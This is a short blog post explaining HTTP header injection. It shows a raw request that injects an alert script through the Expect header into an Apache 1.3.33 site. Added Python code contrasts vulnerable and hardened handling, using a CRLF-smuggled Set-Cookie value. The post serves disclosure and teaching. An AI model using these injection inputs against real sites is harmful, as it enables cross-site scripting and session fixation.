HTTP Header Injection Vulnerability


HTTP Header

HTTP headers are a component of HTTP requests and responses. Header fields are transmitted with each request and response and carry additional data about them.

See the typical request and response headers here at

HTTP header injection

HTTP header injection is a web application vulnerability that exists in web applications that generate HTTP headers from user-supplied input. If an application places user input in its headers, that input can be used for HTTP response splitting, cross-site scripting (XSS), session fixation via the Set-Cookie header, and malicious redirects via the Location header.

I recently found a similar kind of vulnerability in and for this I was also acknowledged by Apple on its website.

It used Apache 1.3.33, which was vulnerable to HTML and malicious JavaScript injection through the "Expect" header.

See the response header of the website:
GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Cookie: PHPSESSID=3b8026225d719c6945155129c5c7335d
Connection: Close
Expect: <script>alert(411731119275)</script>
Pragma: no-cache
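
The two failure modes described in this post, each shown beside a hardened form. This is an added example, not code from the original post or from Apache; the function names, the redirect handler, the error-page wording and the Set-Cookie sample input are assumptions made for illustration.

```python
import html

# Constructed sample inputs. EXPECT_INPUT repeats the Expect value shown in the request above.
SPLIT_INPUT = "/home\r\nSet-Cookie: PHPSESSID=fixed"
EXPECT_INPUT = "<script>alert(411731119275)</script>"


def header_names(raw_response):
    """Return the header names a client would parse from a raw response head."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[0] for line in head.split("\r\n")[1:] if ":" in line]


def redirect_unsafe(target):
    # Vulnerable: user input is concatenated into the Location header as-is,
    # so a CR/LF pair in the input starts a new header line.
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n\r\n"


def redirect_safe(target):
    # Hardened: refuse every control character (conservatively including tab),
    # so the value can never terminate the header line it is written into.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        raise ValueError("control character in header value")
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n\r\n"


def error_body_unsafe(expect):
    # Vulnerable: a request header value is reflected into HTML without encoding.
    return f"<p>Unsupported Expect value: {expect}</p>"


def error_body_safe(expect):
    # Hardened: HTML-encode the reflected value so the browser renders it as text.
    return f"<p>Unsupported Expect value: {html.escape(expect)}</p>"


if __name__ == "__main__":
    print(header_names(redirect_unsafe(SPLIT_INPUT)))  # extra header appears
    print(error_body_safe(EXPECT_INPUT))               # markup is neutralised
```

Validation at the point where the header is written matters more than filtering at the input layer, because the same value may reach the response through more than one code path.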

AtiHackingTricks.blogspot.Com © 2009. All Rights Reserved